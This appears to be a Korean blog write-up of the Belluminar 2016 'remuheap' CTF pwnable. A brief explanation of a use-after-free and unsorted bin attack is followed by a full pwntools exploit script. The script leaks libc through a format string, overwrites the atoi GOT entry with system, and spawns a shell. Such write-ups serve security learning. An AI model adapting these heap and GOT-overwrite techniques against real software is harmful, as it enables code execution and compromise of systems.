-
Belluminar 2016 remuheapPwnable/CTF 2017. 10. 19. 01:06
fgets를 쓰면 힙에 malloc가 되고 데이터를 쓴다.
그 malloc된 힙을 이용하여서 UAF이후 unsorted bin attack 한 다음에 전역변수 공간에(bss) fake chunk를 만들어주고
릭 하고 공격하면 된다.
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172from pwn import *p=process("./remuheap")elf=ELF("./remuheap")def malloc(size,data):p.recvuntil('> ')p.sendline("1")p.recvuntil(': ')p.sendline(str(size))p.recvuntil(': ')p.sendline(data)def free():p.recvuntil('> ')p.sendline("2")print "free"def modify(age_yn,age,name,nameyn):p.recvuntil('> ')p.sendline("3")p.recvuntil('? ')p.sendline(age_yn)if(age_yn=='y'):p.recv(1024)p.sendline(str(age))print "y input"p.recvuntil(': ')p.sendline(name)p.recvuntil('? ')p.sendline(nameyn)def exit(code):p.recvuntil('> ')p.sendline("5")p.recvuntil(': ')p.sendline(str(code))person_info = 0x6020d0malloc(4096,"A"*10)free()modify('y',32,"B"*10,'y')free()modify('y',32,p64(0)+p64(person_info-0x18),'y')exit(0x211)malloc(514,p64(elf.got['atoi']-0x8)+p64(elf.got['atoi']-0x8))modify('n',32,p64(elf.plt['printf']),'y')p.recv(1024)p.sendline("%7$p")puts = int(p.recv(14),16) - 362 #-362libc_base = puts - 0x6f690oneshot = libc_base + 0x4526asystem = libc_base + 0x45390print hex(puts)print hex(libc_base)print hex(system)p.recv(1024)p.sendline("33")p.recvuntil('? ')p.sendline('n')p.recvuntil(': ')p.sendline(p64(system))p.recvuntil('? ')p.sendline('y')p.sendline("/bin/sh\00")p.interactive()cs 'Pwnable > CTF' 카테고리의 다른 글
RCTF 2015 SHAXPIAN (0) 2017.11.04 RCTF 2015 welpwn (0) 2017.11.04 31c3ctf 2014 mynx (1) 2017.10.09 bctf 2016 memo (0) 2017.10.02 hitcon 2014 stkof (0) 2017.09.04